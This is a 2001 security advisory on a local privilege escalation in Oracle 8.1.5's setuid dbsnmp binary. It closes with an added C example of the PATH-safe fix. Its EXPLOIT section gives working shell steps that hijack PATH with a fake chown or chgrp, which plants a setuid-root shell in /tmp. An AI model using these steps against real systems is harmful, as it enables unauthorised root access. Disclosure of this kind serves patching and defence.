

Oracle 8.1.5 dbsnmp vulnerability


Date: Wed, 1 Aug 2001 19:14:07 +0200
From: Ismael Briones <[email protected]>
To: [email protected]
Subject: Oracle 8.1.5 dbnsmp vulnerability

Title:         Vulnerability in dbsnmp in Oracle 8.1.5
Date:        01-08-2001
Platform:   Only tested on Digital Unix.
Impact:     Any user can gain root privileges
Author:     Ismael Briones Vilar ([email protected])
Status:     Vendor contacted, and they are investigating a fix.

PROBLEM SUMMARY:

    There is a problem in dbsnmp that can be used by local users to obtain 
root privileges. dbsnmp is setuid root. When a user executes dbsnmp, it 
calls chown and chgrp without specifying the full path, so any user can 
set his PATH variable to exploit this vulnerability:

     Tested on Oracle 8.1.5.
     Oracle 8.1.6 is not vulnerable.


IMPACT:

   Any user with local access can gain root privileges.

SOLUTION:

   Maybe a chmod -s

STATUS:

   The vendor was contacted on 30/07/2001 and Oracle answered: 

	"We are investigating a fix as we speak."

EXPLOIT:


export PATH=~/bin/:$PATH

Then we create the file ~/bin/chown or ~/bin/chgrp:

#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

(Everything has to go on the same line, separated by semicolons.)

We make our chown or chgrp executable: 

chmod +x  ~/bin/chown

chmod +x  ~/bin/chgrp

When the user executes dbsnmp, the system looks for chown in the first 
directory of the PATH variable, executes our chown file, and we have a 
setuid-root shell in /tmp/XXX.


-------------------------
        Ismael Briones Vilar          
        [email protected]        
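
The code-level fix for the flaw described above, as an added example that is not part of the original advisory and is not Oracle's code: a privileged program runs its helper by absolute path with a fixed environment, so the caller's PATH is never consulted. The names run_helper and SAFE_ENV are hypothetical, and how dbsnmp actually invokes chown is an assumption, since the advisory does not show it.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the helper; nothing is inherited from the caller. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/*
 * Run a helper by absolute path with a fixed environment.
 * Returns the helper's exit status, or -1 if the path is not absolute,
 * fork/wait fails, or the helper did not exit normally.
 *
 * The risky pattern this replaces (assumed; the advisory does not show
 * dbsnmp's code) is system("chown ...") or execvp("chown", ...), both of
 * which resolve the bare name through the caller-controlled PATH.
 */
int run_helper(const char *abs_path, char *const argv[])
{
    pid_t pid;
    int status;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;              /* refuse anything that needs a PATH search */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);  /* no PATH lookup, no inherited env */
        _exit(127);                        /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed demo: the parent's PATH is hostile, the helper still sees SAFE_ENV. */
    char *const argv[] = { "sh", "-c", "echo \"helper PATH=$PATH\"", NULL };

    setenv("PATH", "/tmp/attacker-bin", 1);
    return run_helper("/bin/sh", argv) == 0 ? 0 : 1;
}
```

Until a patched binary is installed, removing the setuid bit, as the SOLUTION section suggests, takes away the privilege that a PATH-resolved helper would inherit.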
 



